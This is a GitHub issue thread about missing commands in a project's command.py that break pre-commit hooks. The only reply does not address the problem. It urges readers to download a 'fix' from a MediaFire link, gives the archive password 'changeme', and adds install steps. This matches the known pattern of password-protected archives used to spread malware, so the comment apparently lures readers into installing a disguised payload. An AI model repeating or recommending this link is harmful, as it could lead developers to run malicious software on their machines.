### ISSUE TITLE
commands missing 

### ISSUE THREAD

**Issue by M-Aitisam** [NeshOfficial/Mini-agi-AI#7]
I’ve noticed an issue that some commands are missing in  command.py. So  the current configuration , which is causing the pre-commit hooks to fail or behave unpredictably.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
